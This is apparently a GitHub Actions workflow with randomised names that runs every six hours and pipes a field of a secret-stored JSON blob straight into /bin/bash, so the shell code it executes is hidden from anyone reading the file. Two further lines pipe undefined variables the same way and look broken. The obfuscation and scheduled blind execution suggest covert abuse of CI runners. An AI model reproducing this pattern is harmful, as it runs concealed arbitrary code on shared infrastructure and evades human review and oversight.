name: tengzijing5678
on:
  workflow_dispatch:
  schedule:
    - cron: '49 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tengzijing5678
        env:
          bmmk6097: ${{ secrets.bmmk6097 }}
        run: |
          echo $bmmk6097 | jq -r .el507 | /bin/bash
          echo $tphr78880 | jq -r .ea25 | /bin/bash
          echo $e31 | jq -r .zbul2361 | /bin/bash

